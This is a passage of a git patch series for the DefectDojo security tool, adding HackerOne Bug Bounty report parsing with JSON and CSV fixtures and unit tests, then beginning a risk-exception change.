b/unittests/test_rest_framework.py @@ -1699,8 +1699,19 @@ def __init__(self, *args, **kwargs): self.deleted_objects = 25 BaseClass.RESTEndpointTest.__init__(self, *args, **kwargs) + def test_create(self): + payload = self.payload.copy() | { + "password": "testTEST1234!@#$", + } + length = self.endpoint_model.objects.count() + response = self.client.post(self.url, payload) + self.assertEqual(201, response.status_code, response.content[:1000]) + self.assertEqual(self.endpoint_model.objects.count(), length + 1) + def test_create_user_with_non_configuration_permissions(self): - payload = self.payload.copy() + payload = self.payload.copy() | { + "password": "testTEST1234!@#$", + } payload["configuration_permissions"] = [25, 26] # these permissions exist but user can not assign them becaause they are not "configuration_permissions" response = self.client.post(self.url, payload) self.assertEqual(response.status_code, 400) From ad7939d43ab93f3b9177b0e278b5aed4ca332208 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 21:02:18 -0500 Subject: [PATCH 51/62] Hacker One Parser: Add support for Bug Bounty Program reports (#10939) * Restructure parser for extendability * Support for bug bounty reports * Correct ruff --- dojo/settings/.settings.dist.py.sha256sum | 2 +- dojo/settings/settings.dist.py | 1 + dojo/tools/h1/parser.py | 245 ++++++++++++++---- unittests/scans/h1/bug_bounty_many.csv | 5 + unittests/scans/h1/bug_bounty_many.json | 116 +++++++++ unittests/scans/h1/bug_bounty_one.csv | 2 + unittests/scans/h1/bug_bounty_one.json | 32 +++ unittests/scans/h1/bug_bounty_zero.csv | 1 + unittests/scans/h1/bug_bounty_zero.json | 3 + ...ta_many.json => vuln_disclosure_many.json} | 0 ...data_one.json => vuln_disclosure_one.json} | 0 ...a_empty.json => vuln_disclosure_zero.json} | 0 unittests/tools/test_h1_parser.py | 160 +++++++++++- 13 files changed, 513 insertions(+), 54 deletions(-) create mode 100644 unittests/scans/h1/bug_bounty_many.csv create mode 100644 unittests/scans/h1/bug_bounty_many.json create mode 100644 unittests/scans/h1/bug_bounty_one.csv create mode 100644 unittests/scans/h1/bug_bounty_one.json create mode 100644 unittests/scans/h1/bug_bounty_zero.csv create mode 100644 unittests/scans/h1/bug_bounty_zero.json rename unittests/scans/h1/{data_many.json => vuln_disclosure_many.json} (100%) rename unittests/scans/h1/{data_one.json => vuln_disclosure_one.json} (100%) rename 
unittests/scans/h1/{data_empty.json => vuln_disclosure_zero.json} (100%) diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum index 5dfa946a6c2..f8adf9d7d4e 100644 --- a/dojo/settings/.settings.dist.py.sha256sum +++ b/dojo/settings/.settings.dist.py.sha256sum @@ -1 +1 @@ -b330f7dbd92c2df5a2a0632befc9775bef4a1c62b90375aa511957ebcd0ea82a +f7e63afa0003d1992f8247f9a7a830847bd7498fa1e2d46d6ea04e3006bb9ee2 diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py index d96733ca8ff..348596ef75b 100644 --- a/dojo/settings/settings.dist.py +++ b/dojo/settings/settings.dist.py @@ -1280,6 +1280,7 @@ def saml2_attrib_map_format(dict): "Legitify Scan": ["title", "endpoints", "severity"], "ThreatComposer Scan": ["title", "description"], "Invicti Scan": ["title", "description", "severity"], + "HackerOne Cases": ["title", "severity"], "KrakenD Audit Scan": ["description", "mitigation", "severity"], } diff --git a/dojo/tools/h1/parser.py b/dojo/tools/h1/parser.py index 457e01c06f5..e182af6b762 100644 --- a/dojo/tools/h1/parser.py +++ b/dojo/tools/h1/parser.py @@ -1,44 +1,36 @@ +import csv import hashlib +import io import json +from contextlib import suppress from datetime import datetime +from typing import ClassVar -from dojo.models import Finding +from dateutil import parser as date_parser +from django.core.files.uploadedfile import TemporaryUploadedFile + +from dojo.models import Finding, Test __author__ = "Kirill Gotsman" -class H1Parser: +class HackerOneVulnerabilityDisclosureProgram: """ - A class that can be used to parse the Get All Reports JSON export from HackerOne API. + Vulnerability Disclosure Program HackerOne reports """ - def get_scan_types(self): - return ["HackerOne Cases"] - - def get_label_for_scan_types(self, scan_type): - return scan_type - - def get_description_for_scan_types(self, scan_type): - return "Import HackerOne cases findings in JSON format." 
- - def get_findings(self, file, test): + def get_vulnerability_disclosure_json_findings(self, tree, test): """ Converts a HackerOne reports to a DefectDojo finding """ - - # Load the contents of the JSON file into a dictionary - data = file.read() - try: - tree = json.loads(str(data, "utf-8")) - except Exception: - tree = json.loads(data) # Convert JSON report to DefectDojo format dupes = {} for content in tree["data"]: # Get all relevant data date = content["attributes"]["created_at"] date = datetime.strftime( - datetime.strptime(date, "%Y-%m-%dT%H:%M:%S.%fZ"), "%Y-%m-%d", + datetime.strptime(date, "%Y-%m-%dT%H:%M:%S.%fZ"), + "%Y-%m-%d", ) # Build the title of the Dojo finding title = "#" + content["id"] + " " + content["attributes"]["title"] @@ -47,21 +39,15 @@ def get_findings(self, file, test): # References try: - issue_tracker_id = content["attributes"][ - "issue_tracker_reference_id" - ] - issue_tracker_url = content["attributes"][ - "issue_tracker_reference_url" - ] + issue_tracker_id = content["attributes"]["issue_tracker_reference_id"] + issue_tracker_url = content["attributes"]["issue_tracker_reference_url"] references = f"[{issue_tracker_id}]({issue_tracker_url})\n" except Exception: references = "" # Build the severity of the Dojo finding try: - severity = content["relationships"]["severity"]["data"][ - "attributes" - ]["rating"].capitalize() + severity = content["relationships"]["severity"]["data"]["attributes"]["rating"].capitalize() if severity not in ["Low", "Medium", "High", "Critical"]: severity = "Info" except Exception: @@ -81,9 +67,7 @@ def get_findings(self, file, test): # Set CWE of the Dojo finding try: cwe = int( - content["relationships"]["weakness"]["data"]["attributes"][ - "external_id" - ][4:], + content["relationships"]["weakness"]["data"]["attributes"]["external_id"][4:], ) except Exception: cwe = 0 @@ -121,11 +105,10 @@ def get_findings(self, file, test): def build_description(self, content): date = content["attributes"]["created_at"] date = datetime.strftime( - datetime.strptime(date, "%Y-%m-%dT%H:%M:%S.%fZ"), "%Y-%m-%d", + datetime.strptime(date, "%Y-%m-%dT%H:%M:%S.%fZ"), + "%Y-%m-%d", ) - reporter = content["relationships"]["reporter"]["data"]["attributes"][ - "username" - ] + reporter = content["relationships"]["reporter"]["data"]["attributes"]["username"] triaged_date = content["attributes"]["triaged_at"] # Build the description of the Dojo finding @@ -142,9 +125,7 @@ def build_description(self, content): # Try to grab CVSS try: - cvss = content["relationships"]["severity"]["data"]["attributes"][ - "score" - ] + cvss = content["relationships"]["severity"]["data"]["attributes"]["score"] description += f"CVSS: {cvss}\n" except Exception: pass @@ -156,14 +137,186 @@ def build_description(self, content): # Try to grab weakness if it's there try: - weakness_title = content["relationships"]["weakness"]["data"][ - "attributes" - ]["name"] - weakness_desc = content["relationships"]["weakness"]["data"][ - "attributes" - ]["description"] + weakness_title = content["relationships"]["weakness"]["data"]["attributes"]["name"] + weakness_desc = content["relationships"]["weakness"]["data"]["attributes"]["description"] description += f"\n##Weakness: {weakness_title}\n{weakness_desc}" except Exception: pass return description + + +class HackerOneBugBountyProgram: + """Bug Bounty Program HackerOne reports.""" + + fields_to_label: ClassVar[dict[str, str]] = { + "id": "ID", + "weakness": "Weakness Category", + "substate": "Substate", + "reporter": "Reporter", + "assigned": 
"Assigned To", + "public": "Public", + "triageted_at": "Triaged On", + "closed_at": "Closed On", + "awarded_at": "Awarded On", + "bounty": "Bounty Price", + "bonus": "Bonus", + "first_response_at": "First Response On", + "source": "Source", + "reference": "Reference", + "reference_url": "Reference URL", + "structured_scope": "Structured Scope", + "structured_scope_reference": "Structured Scope Reference", + "original_report_id": "Original Report ID", + "collaborating_users": "Collaboration Users", + "duplicate_report_ids": "Duplicate Report IDs", + } + + def get_bug_bounty_program_json_findings(self, dict_list: dict, test: Test) -> list[Finding]: + return self.parse_findings(dict_list, test) + + def get_bug_bounty_program_csv_findings(self, dict_list: dict, test: Test) -> list[Finding]: + return self.parse_findings(dict_list, test) + + def parse_findings(self, dict_list: list[dict], test: Test) -> list[Finding]: + """Return a list of findings generated by the submitted report.""" + findings = [] + for entry in dict_list: + status_dict = self.determine_status(entry) + finding = Finding( + title=entry.get("title"), + severity=self.convert_severity(entry), + description=self.parse_description(entry), + date=date_parser.parse(entry.get("reported_at")), + dynamic_finding=True, + test=test, + **status_dict, + ) + # Add vulnerability IDs if they are present + if (cve_str := entry.get("cve_ids")) is not None and len(cve_str) > 0: + finding.unsaved_vulnerability_ids = [cve_str] + # Add the finding the the list + findings.append(finding) + return findings + + def determine_status(self, row) -> dict: + """Generate a dict of status meta to fully represent that state of the finding + + Possible states currently supported are open and closed. In the event that neither + of those options are present, the open status will be the default, and returned + """ + default_status = { + "active": True, + } + # Open status -> active = True + # Closed status -> is_mitigated = True + timestamp + if (status := row.get("state")) is not None: + if status == "open": + return default_status + if status == "closed": + return { + "is_mitigated": True, + "active": False, + "mitigated": date_parser.parse(row.get("closed_at")), + } + return default_status + + def convert_severity(self, entry: dict) -> str: + """Convert the severity from the parser from the string value, or CVSS score.""" + # Try to use the string severity first + if (severity := entry.get("severity_rating")) is not None: + if severity in ["critical", "high", "medium", "low"]: + return severity.capitalize() + # Fall back to "severity_score" which I assume is CVSS Score + if (severity_score := entry.get("severity_score")) is not None: + with suppress(ValueError): + severity_score = float(severity_score) + if severity_score >= 9.0: + return "Critical" + if severity_score >= 7.0: + return "High" + if severity_score >= 4.0: + return "Medium" + if severity_score > 0.0: + return "Low" + # Default to Info in all cases (assuming we reach this) + return "Info" + + def parse_description(self, entry: dict) -> str: + """Build the description from the mapping set in the fields_to_label var.""" + # Iterate over the items and build the string + description = "" + for field, label in self.fields_to_label.items(): + if (value := entry.get(field)) is not None and len(value) > 0: + description += f"**{label}**: {value}\n" + return description + + +class H1Parser( + HackerOneVulnerabilityDisclosureProgram, + HackerOneBugBountyProgram, +): + """ + A class that can be used to parse 
the Get All Reports JSON export from HackerOne API.
+    """
+
+    def get_scan_types(self):
+        return ["HackerOne Cases"]
+
+    def get_label_for_scan_types(self, scan_type):
+        return scan_type
+
+    def get_description_for_scan_types(self, scan_type):
+        return "Import HackerOne cases findings in JSON format."
+
+    def get_findings(self, file: TemporaryUploadedFile, test: Test) -> list[Finding]:
+        """Return the list of findings generated from the uploaded report."""
+        # first determine which format to parse
+        file_name = file.name
+        if str(file_name).endswith(".json"):
+            return self.determine_json_format(file, test)
+        elif str(file_name).endswith(".csv"):
+            return self.determine_csv_format(file, test)
+        else:
+            msg = "Filename extension not recognized. Use .json or .csv"
+            raise ValueError(msg)
+
+    def get_json_tree(self, file: TemporaryUploadedFile) -> dict:
+        """Extract the JSON file into a dict that represents the report tree."""
+        data = file.read()
+        try:
+            tree = json.loads(str(data, "utf-8"))
+        except Exception:
+            tree = json.loads(data)
+        return tree
+
+    def determine_json_format(self, file: TemporaryUploadedFile, test: Test) -> list[Finding]:
+        """Evaluate the format of the JSON report that was uploaded to determine which parser to use."""
+        tree = self.get_json_tree(file)
+        # Check for some root elements
+        if "findings" in tree:
+            return self.get_bug_bounty_program_json_findings(tree.get("findings", []), test)
+        if "data" in tree:
+            return self.get_vulnerability_disclosure_json_findings(tree, test)
+        else:
+            msg = "This JSON format is not supported"
+            raise ValueError(msg)
+
+    def get_csv_reader(self, file: TemporaryUploadedFile) -> csv.DictReader:
+        """Extract the CSV file into an iterable that represents a dict."""
+        if file is None:
+            return ()
+        content = file.read()
+        if isinstance(content, bytes):
+            content = content.decode("utf-8")
+        return csv.DictReader(io.StringIO(content), delimiter=",", quotechar='"')
+
+    def determine_csv_format(self, file: TemporaryUploadedFile, test: Test) -> list[Finding]:
+        """Evaluate the format of the CSV report that was uploaded to determine which parser to use."""
+        reader = self.get_csv_reader(file)
+        # Check for some root elements
+        if "bounty" in reader.fieldnames:
+            return self.get_bug_bounty_program_csv_findings(reader, test)
+        else:
+            msg = "This CSV format is not supported"
+            raise ValueError(msg)
diff --git a/unittests/scans/h1/bug_bounty_many.csv b/unittests/scans/h1/bug_bounty_many.csv
new file mode 100644
index 00000000000..a6bc207d64b
--- /dev/null
+++ b/unittests/scans/h1/bug_bounty_many.csv
@@ -0,0 +1,5 @@
+id,title,severity_rating,severity_score,state,substate,weakness,reported_at,first_response_at,triaged_at,closed_at,awarded_at,assigned,reporter,source,bounty,bonus,public,reference,reference_url,structured_scope,structured_scope_reference,original_report_id,cve_ids,collaborating_users,duplicate_report_ids
diff --git a/unittests/scans/h1/bug_bounty_many.csv b/unittests/scans/h1/bug_bounty_many.csv
new file mode 100644
index 00000000000..a6bc207d64b
--- /dev/null
+++ b/unittests/scans/h1/bug_bounty_many.csv
@@ -0,0 +1,5 @@
+id,title,severity_rating,severity_score,state,substate,weakness,reported_at,first_response_at,triaged_at,closed_at,awarded_at,assigned,reporter,source,bounty,bonus,public,reference,reference_url,structured_scope,structured_scope_reference,original_report_id,cve_ids,collaborating_users,duplicate_report_ids
+2501687,Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration,medium,,open,triaged,Information Disclosure,2024-05-12 04:05:27 UTC,2024-05-14 22:14:16 UTC,2024-08-28 19:35:16 UTC,,2024-08-28 19:40:24 UTC,Group example.co Team,reporter,,400.0,,no,,,1489537348,,,"",,
+2710467,Acceso no autorizado a soporte premium sin pagar,critical,9.1,open,new,,2024-09-10 15:38:20 UTC,,,,,,reporter,,,,no,,,example.co,,,"",,
+2682608,XSS - stg.pse.mock.example.co,none,0.0,closed,duplicate,,2024-08-25 07:27:18 UTC,2024-08-27 18:19:23 UTC,,2024-08-27 18:19:23 UTC,,,reporter,,,,no,,,,,2311675,"",,
+2616856,example.co/File creation via HTTP method PUT,critical,,closed,duplicate,,2024-07-22 17:54:36 UTC,2024-07-22 20:57:56 UTC,,2024-07-22 20:57:56 UTC,,,reporter,,,,no,,,example.co,,2597854,CVE-2017-12615,,
diff --git a/unittests/scans/h1/bug_bounty_many.json b/unittests/scans/h1/bug_bounty_many.json
new file mode 100644
index 00000000000..ba3b7e3eb14
--- /dev/null
+++ b/unittests/scans/h1/bug_bounty_many.json
@@ -0,0 +1,116 @@
+{
+    "findings": [
+        {
+            "id": "2501687",
+            "title": "Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration",
+            "severity_rating": "medium",
+            "severity_score": "",
+            "state": "open",
+            "substate": "triaged",
+            "weakness": "Information Disclosure",
+            "reported_at": "2024-05-12 04:05:27 UTC",
+            "first_response_at": "2024-05-14 22:14:16 UTC",
+            "triaged_at": "2024-08-28 19:35:16 UTC",
+            "closed_at": "",
+            "awarded_at": "2024-08-28 19:40:24 UTC",
+            "assigned": "Group example.co Team",
+            "reporter": "reporter",
+            "source": "",
+            "bounty": "400.0",
+            "bonus": "",
+            "public": "no",
+            "reference": "",
+            "reference_url": "",
+            "structured_scope": "1489537348",
+            "structured_scope_reference": "",
+            "original_report_id": "",
+            "cve_ids": "",
+            "collaborating_users": "",
+            "duplicate_report_ids": ""
+        },
+        {
+            "id": "2710467",
+            "title": "Acceso no autorizado a soporte premium sin pagar",
+            "severity_rating": "critical",
+            "severity_score": "9.1",
+            "state": "open",
+            "substate": "new",
+            "weakness": "",
+            "reported_at": "2024-09-10 15:38:20 UTC",
+            "first_response_at": "",
+            "triaged_at": "",
+            "closed_at": "",
+            "awarded_at": "",
+            "assigned": "",
+            "reporter": "reporter",
+            "source": "",
+            "bounty": "",
+            "bonus": "",
+            "public": "no",
+            "reference": "",
+            "reference_url": "",
+            "structured_scope": "example.co",
+            "structured_scope_reference": "",
+            "original_report_id": "",
+            "cve_ids": "",
+            "collaborating_users": "",
+            "duplicate_report_ids": ""
+        },
+        {
+            "id": "2682608",
+            "title": "XSS - stg.pse.mock.example.co",
+            "severity_rating": "none",
+            "severity_score": "0.0",
+            "state": "closed",
+            "substate": "duplicate",
+            "weakness": "",
+            "reported_at": "2024-08-25 07:27:18 UTC",
+            "first_response_at": "2024-08-27 18:19:23 UTC",
+            "triaged_at": "",
+            "closed_at": "2024-08-27 18:19:23 UTC",
+            "awarded_at": "",
+            "assigned": "",
+            "reporter": "reporter",
+            "source": "",
+            "bounty": "",
+            "bonus": "",
+            "public": "no",
+            "reference": "",
+            "reference_url": "",
+            "structured_scope": "",
+            "structured_scope_reference": "",
+            "original_report_id": "2311675",
+            "cve_ids": "",
+            "collaborating_users": "",
+            "duplicate_report_ids": ""
+        },
+        {
+            "id": "2616856",
+            "title": "example.co/File creation via HTTP method PUT",
+            "severity_rating": "critical",
+            "severity_score": "",
+            "state": "closed",
+            "substate": "duplicate",
+            "weakness": "",
+            "reported_at": "2024-07-22 17:54:36 UTC",
+            "first_response_at": "2024-07-22 20:57:56 UTC",
+            "triaged_at": "",
+            "closed_at": "2024-07-22 20:57:56 UTC",
+            "awarded_at": "",
+            "assigned": "",
+            "reporter": "reporter",
+            "source": "",
+            "bounty": "",
+            "bonus": "",
+            "public": "no",
+            "reference": "",
+            "reference_url": "",
+            "structured_scope": "example.co",
+            "structured_scope_reference": "",
+            "original_report_id": "2597854",
+            "cve_ids": "CVE-2017-12615",
+            "collaborating_users": "",
+            "duplicate_report_ids": ""
+        }
+    ]
+}
\ No newline at end of file
diff --git a/unittests/scans/h1/bug_bounty_one.csv b/unittests/scans/h1/bug_bounty_one.csv
new file mode 100644
index 00000000000..7b13f4fdc0f
--- /dev/null
+++ b/unittests/scans/h1/bug_bounty_one.csv
@@ -0,0 +1,2 @@
+id,title,severity_rating,severity_score,state,substate,weakness,reported_at,first_response_at,triaged_at,closed_at,awarded_at,assigned,reporter,source,bounty,bonus,public,reference,reference_url,structured_scope,structured_scope_reference,original_report_id,cve_ids,collaborating_users,duplicate_report_ids
+2501687,Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration,medium,,open,triaged,Information Disclosure,2024-05-12 04:05:27 UTC,2024-05-14 22:14:16 UTC,2024-08-28 19:35:16 UTC,,2024-08-28 19:40:24 UTC,Group example.co Team,reporter,,400.0,,no,,,1489537348,,,"",,
diff --git a/unittests/scans/h1/bug_bounty_one.json b/unittests/scans/h1/bug_bounty_one.json
new file mode 100644
index 00000000000..e70e6932eae
--- /dev/null
+++ b/unittests/scans/h1/bug_bounty_one.json
@@ -0,0 +1,32 @@
+{
+    "findings": [
+        {
+            "id": "2501687",
+            "title": "Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration",
+            "severity_rating": "medium",
+            "severity_score": "",
+            "state": "open",
+            "substate": "triaged",
+            "weakness": "Information Disclosure",
+            "reported_at": "2024-05-12 04:05:27 UTC",
+            "first_response_at": "2024-05-14 22:14:16 UTC",
+            "triaged_at": "2024-08-28 19:35:16 UTC",
+            "closed_at": "",
+            "awarded_at": "2024-08-28 19:40:24 UTC",
+            "assigned": "Group example.co Team",
+            "reporter": "reporter",
+            "source": "",
+            "bounty": "400.0",
+            "bonus": "",
+            "public": "no",
+            "reference": "",
+            "reference_url": "",
+            "structured_scope": "1489537348",
+            "structured_scope_reference": "",
+            "original_report_id": "",
+            "cve_ids": "",
+            "collaborating_users": "",
+            "duplicate_report_ids": ""
+        }
+    ]
+}
\ No newline at end of file
diff --git a/unittests/scans/h1/bug_bounty_zero.csv b/unittests/scans/h1/bug_bounty_zero.csv
new file mode 100644
index 00000000000..2d388b1293f
--- /dev/null
+++ b/unittests/scans/h1/bug_bounty_zero.csv
@@ -0,0 +1 @@
+id,title,severity_rating,severity_score,state,substate,weakness,reported_at,first_response_at,triaged_at,closed_at,awarded_at,assigned,reporter,source,bounty,bonus,public,reference,reference_url,structured_scope,structured_scope_reference,original_report_id,cve_ids,collaborating_users,duplicate_report_ids
diff --git a/unittests/scans/h1/bug_bounty_zero.json b/unittests/scans/h1/bug_bounty_zero.json
new file mode 100644
index 00000000000..b8046d01053
--- /dev/null
+++ b/unittests/scans/h1/bug_bounty_zero.json
@@ -0,0 +1,3 @@
+{
+    "findings": []
+}
\ No newline at end of file
diff --git a/unittests/scans/h1/data_many.json b/unittests/scans/h1/vuln_disclosure_many.json
similarity index 100%
rename from unittests/scans/h1/data_many.json
rename to unittests/scans/h1/vuln_disclosure_many.json
diff --git a/unittests/scans/h1/data_one.json b/unittests/scans/h1/vuln_disclosure_one.json
similarity index 100%
rename from unittests/scans/h1/data_one.json
rename to unittests/scans/h1/vuln_disclosure_one.json
diff --git a/unittests/scans/h1/data_empty.json b/unittests/scans/h1/vuln_disclosure_zero.json
similarity index 100%
rename from unittests/scans/h1/data_empty.json
rename to unittests/scans/h1/vuln_disclosure_zero.json
diff --git a/unittests/tools/test_h1_parser.py b/unittests/tools/test_h1_parser.py
index 4b4e6020200..685220ff039 100644
--- a/unittests/tools/test_h1_parser.py
+++ b/unittests/tools/test_h1_parser.py
@@ -1,24 +1,170 @@
+from dateutil import parser as date_parser
+
 from dojo.models import Test
 from dojo.tools.h1.parser import H1Parser
 from unittests.dojo_test_case import DojoTestCase
 
 
-class TestHackerOneParser(DojoTestCase):
+class HackerOneVulnerabilityDisclosureProgramTests(DojoTestCase):
+    def test_parse_file_with_multiple_vuln_has_multiple_finding(self):
+        with open("unittests/scans/h1/vuln_disclosure_many.json", encoding="utf-8") as testfile:
+            parser = H1Parser()
+            findings = parser.get_findings(testfile, Test())
+            self.assertEqual(2, len(findings))
+
+    def test_parse_file_with_one_vuln_has_one_finding(self):
+        with open("unittests/scans/h1/vuln_disclosure_one.json", encoding="utf-8") as testfile:
+            parser = H1Parser()
+            findings = parser.get_findings(testfile, Test())
+            self.assertEqual(1, len(findings))
 
     def test_parse_file_with_no_vuln_has_no_finding(self):
-        with open("unittests/scans/h1/data_empty.json", encoding="utf-8") as testfile:
+        with open("unittests/scans/h1/vuln_disclosure_zero.json", encoding="utf-8") as testfile:
             parser = H1Parser()
             findings = parser.get_findings(testfile, Test())
             self.assertEqual(0, len(findings))
 
-    def test_parse_file_with_one_vuln_has_one_finding(self):
-        with open("unittests/scans/h1/data_one.json", encoding="utf-8") as testfile:
+
+class HackerOneBugBountyProgramTests(DojoTestCase):
+    def test_bug_bounty_hacker_one_many_findings_json(self):
+        with open("unittests/scans/h1/bug_bounty_many.json", encoding="utf-8") as testfile:
+            parser = H1Parser()
+            findings = parser.get_findings(testfile, Test())
+            self.assertEqual(4, len(findings))
+            with self.subTest():
+                finding = findings[0]
+                self.assertEqual(
+                    "Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration",
+                    finding.title,
+                )
+                self.assertEqual("Medium", finding.severity)
+                self.assertEqual(date_parser.parse("2024-05-12 04:05:27 UTC"), finding.date)
+                self.assertTrue(finding.active)
+                self.assertIn("**Assigned To**: Group example.co Team", finding.description)
+                self.assertIn("**Weakness Category**: Information Disclosure", finding.description)
+                self.assertIn("**Reporter**: reporter", finding.description)
+            with self.subTest():
+                finding = findings[1]
+                self.assertEqual("Acceso no autorizado a soporte premium sin pagar", finding.title)
+                self.assertEqual("Critical", finding.severity)
+                self.assertEqual(date_parser.parse("2024-09-10 15:38:20 UTC"), finding.date)
+                self.assertTrue(finding.active)
+                self.assertIn("**Reporter**: reporter", finding.description)
+            with self.subTest():
+                finding = findings[2]
+                self.assertEqual("XSS - stg.pse.mock.example.co", finding.title)
+                self.assertEqual("Info", finding.severity)
+                self.assertEqual(date_parser.parse("2024-08-25 07:27:18 UTC"), finding.date)
+                self.assertEqual(date_parser.parse("2024-08-27 18:19:23 UTC"), finding.mitigated)
+                self.assertFalse(finding.active)
+                self.assertTrue(finding.is_mitigated)
+                self.assertIn("**Reporter**: reporter", finding.description)
+            with self.subTest():
+                finding = findings[3]
+                self.assertEqual("example.co/File creation via HTTP method PUT", finding.title)
+                self.assertEqual("Critical", finding.severity)
+                self.assertEqual(date_parser.parse("2024-07-22 17:54:36 UTC"), finding.date)
+                self.assertEqual(date_parser.parse("2024-07-22 20:57:56 UTC"), finding.mitigated)
+                self.assertFalse(finding.active)
+                self.assertTrue(finding.is_mitigated)
+                self.assertIn("**Reporter**: reporter", finding.description)
+                self.assertIn("CVE-2017-12615", finding.unsaved_vulnerability_ids)
+
+    def test_bug_bounty_hacker_one_one_findings_json(self):
+        with open("unittests/scans/h1/bug_bounty_one.json", encoding="utf-8") as testfile:
             parser = H1Parser()
             findings = parser.get_findings(testfile, Test())
             self.assertEqual(1, len(findings))
+            with self.subTest():
+                finding = findings[0]
+                self.assertEqual(
+                    "Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration",
+                    finding.title,
+                )
+                self.assertEqual("Medium", finding.severity)
+                self.assertEqual(date_parser.parse("2024-05-12 04:05:27 UTC"), finding.date)
+                self.assertTrue(finding.active)
+                self.assertIn("**Assigned To**: Group example.co Team", finding.description)
+                self.assertIn("**Weakness Category**: Information Disclosure", finding.description)
+                self.assertIn("**Reporter**: reporter", finding.description)
 
-    def test_parse_file_with_multiple_vuln_has_multiple_finding(self):
-        with open("unittests/scans/h1/data_many.json", encoding="utf-8") as testfile:
+    def test_bug_bounty_hacker_one_zero_findings_json(self):
+        with open("unittests/scans/h1/bug_bounty_zero.json", encoding="utf-8") as testfile:
             parser = H1Parser()
             findings = parser.get_findings(testfile, Test())
-            self.assertEqual(2, len(findings))
+            self.assertEqual(0, len(findings))
+
+    def test_bug_bounty_hacker_one_many_findings_csv(self):
+        with open("unittests/scans/h1/bug_bounty_many.csv", encoding="utf-8") as testfile:
+            parser = H1Parser()
+            findings = parser.get_findings(testfile, Test())
+            self.assertEqual(4, len(findings))
+            with self.subTest():
+                finding = findings[0]
+                self.assertEqual(
+                    "Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration",
+                    finding.title,
+                )
+                self.assertEqual("Medium", finding.severity)
+                self.assertEqual(date_parser.parse("2024-05-12 04:05:27 UTC"), finding.date)
+                self.assertTrue(finding.active)
+                self.assertIn("**Assigned To**: Group example.co Team", finding.description)
+                self.assertIn("**Weakness Category**: Information Disclosure", finding.description)
+                self.assertIn("**Reporter**: reporter", finding.description)
+            with self.subTest():
+                finding = findings[1]
+                self.assertEqual("Acceso no autorizado a soporte premium sin pagar", finding.title)
+                self.assertEqual("Critical", finding.severity)
+                self.assertEqual(date_parser.parse("2024-09-10 15:38:20 UTC"), finding.date)
+                self.assertTrue(finding.active)
+                self.assertIn("**Reporter**: reporter", finding.description)
+            with self.subTest():
+                finding = findings[2]
+                self.assertEqual("XSS - stg.pse.mock.example.co", finding.title)
+                self.assertEqual("Info", finding.severity)
+                self.assertEqual(date_parser.parse("2024-08-25 07:27:18 UTC"), finding.date)
+                self.assertEqual(date_parser.parse("2024-08-27 18:19:23 UTC"), finding.mitigated)
+                self.assertFalse(finding.active)
+                self.assertTrue(finding.is_mitigated)
+                self.assertIn("**Reporter**: reporter", finding.description)
+            with self.subTest():
+                finding = findings[3]
+                self.assertEqual("example.co/File creation via HTTP method PUT", finding.title)
+                self.assertEqual("Critical", finding.severity)
+                self.assertEqual(date_parser.parse("2024-07-22 17:54:36 UTC"), finding.date)
+                self.assertEqual(date_parser.parse("2024-07-22 20:57:56 UTC"), finding.mitigated)
+                self.assertFalse(finding.active)
+                self.assertTrue(finding.is_mitigated)
+                self.assertIn("**Reporter**: reporter", finding.description)
+                self.assertIn("CVE-2017-12615", finding.unsaved_vulnerability_ids)
+
+    def test_bug_bounty_hacker_one_one_findings_csv(self):
+        with open("unittests/scans/h1/bug_bounty_one.csv", encoding="utf-8") as testfile:
+            parser = H1Parser()
+            findings = parser.get_findings(testfile, Test())
+            self.assertEqual(1, len(findings))
+            with self.subTest():
+                finding = findings[0]
+                self.assertEqual(
+                    "Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration",
+                    finding.title,
+                )
+                self.assertEqual("Medium", finding.severity)
+                self.assertEqual(date_parser.parse("2024-05-12 04:05:27 UTC"), finding.date)
+                self.assertTrue(finding.active)
+                self.assertIn("**Assigned To**: Group example.co Team", finding.description)
+                self.assertIn("**Weakness Category**: Information Disclosure", finding.description)
+                self.assertIn("**Reporter**: reporter", finding.description)
+
+    def test_bug_bounty_hacker_one_zero_findings_csv(self):
+        with open("unittests/scans/h1/bug_bounty_zero.csv", encoding="utf-8") as testfile:
+            parser = H1Parser()
+            findings = parser.get_findings(testfile, Test())
+            self.assertEqual(0, len(findings))
+
+
+class TestHackerOneParser(
+    HackerOneVulnerabilityDisclosureProgramTests,
+    HackerOneBugBountyProgramTests,
+):
+    """Combined unit test runner."""
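Editor's note: the combined class above relies on ordinary inheritance; unittest discovers every inherited test_* method, so TestHackerOneParser runs both suites under the original class name. A stripped-down sketch of the pattern, with hypothetical names:

    import unittest

    class JsonCases(unittest.TestCase):
        def test_json_zero(self):
            self.assertEqual(0, len([]))

    class CsvCases(unittest.TestCase):
        def test_csv_zero(self):
            self.assertEqual(0, len([]))

    class AllCases(JsonCases, CsvCases):
        """Runs every test_* method inherited from both parents."""

One trade-off of this layout: because the mixins are themselves TestCase subclasses, a test runner will also collect and run them standalone.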
From ec19ae885cd7d1171854a32deda11a93bea25d10 Mon Sep 17 00:00:00 2001
From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com>
Date: Sat, 21 Sep 2024 11:53:24 -0500
Subject: [PATCH 52/62] Risk Exceptions: Add/Remove notes when finding is added/removed from risk exception (#10934)

* Risk Exceptions: Add/Remove notes when finding is added/removed from risk exception
* Fix Flake8
* Correct tests
* Add user ID to finding note
* use jira user
---
 dojo/api_v2/serializers.py     |  8 +++--
 dojo/api_v2/views.py           |  2 +-
 dojo/engagement/views.py       |  6 ++--
 dojo/finding/views.py          | 16 +++++-----
 dojo/jira_link/helper.py       |  8 ++---
 dojo/risk_acceptance/helper.py | 56 ++++++++++++++++++++++++++++++----
 6 files changed, 71 insertions(+), 25 deletions(-)

diff --git a/dojo/api_v2/serializers.py b/dojo/api_v2/serializers.py
index 10c07b3f3d4..78ea12e7adf 100644
--- a/dojo/api_v2/serializers.py
+++ b/dojo/api_v2/serializers.py
